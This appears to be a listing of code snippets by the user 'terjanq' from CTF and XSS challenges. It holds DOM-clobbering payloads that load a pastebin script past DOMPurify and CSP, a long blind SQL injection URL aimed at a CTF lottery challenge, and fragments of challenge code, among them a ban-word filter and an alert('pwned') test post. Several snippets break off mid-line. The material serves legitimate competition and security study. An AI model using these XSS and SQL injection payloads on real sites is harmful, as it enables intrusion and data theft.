terjanq

<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=test>
<a>

terjanq

<!-- Solution 212! (remove new lines) -->
<a id=CONFIG name=test>
<p>
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<p>
T

terjanq

<a href="https://pastebin.com" id="testPath"></a>
<a id="CONFIG" name=test></a>
<a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a>

terjanq

window.CONFIG = window.CONFIG || {
  version: "v20190816",
  test: false,
  appName: "XSS Challenge",
}

function loadModule(moduleName) {
  const scriptSrc = new URL(document.currentScript.src);
  let url = '';
  

terjanq

const sanitized = DOMPurify.sanitize(input.value);

const html = `
  <meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/">
  <h1>Homepage!</h1>
  <p>Welcome to my homepage! Here are some info about me:</p>
  ${sanitized}
  <script nonce=xyz src="./main.js"><\/script>
`;

terjanq

<!doctype html><meta charset=utf-8>
<title>SecurityMB's Security Challenge</title>
<style>
* {
  font-family: monospace;
}  
textarea {
  width:100%;
  height:90px;

terjanq

https://glotto.web.ctfcompetition.com/?order0=date`=(SELECT+1337+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@

terjanq

SQLite Voting

function is_valid($str) {
  $banword = [
    // dangerous chars
    // " % ' * + / < = > \ _ ` ~ -
    "[\"%'*+\\/<=>\\\\_`~-]",
 // whitespace chars

terjanq

function checksum (element) {
	var string = ''
	string += (element.attributes ? element.attributes.length : 0) + '|'
	for (var i = 0; i < (element.attributes ? element.attributes.length : 0); i++) {
		string += element.attributes[i].name + ':' + element.attributes[i].value + '|'
	}
	string += (element.childNodes ? element.childNodes.length : 0) + '|'
	for (var i = 0; i < (element.childNodes ? element.childNodes.length : 0); i++) {
		string += checksum(element.childNodes[i]) + '|'
	}

terjanq

<!DOCTYPE html SYSTEM "3b16c602b53a3e4fc22f0d25cddb0fc4d1478e0233c83172c36d0a6cf46c171ed5811fbffc3cb9c3705b7258179ef11362760d105fb483937607dd46a6abcffc">
<html>
	<head>
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css">
		<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/sha512.js"></script>
		<script src="../scripts/DOMValidator.js"></script>
	</head>
	<body>
		<h1>test_post</h1>
		<p><script>alert('pwned')</script></p>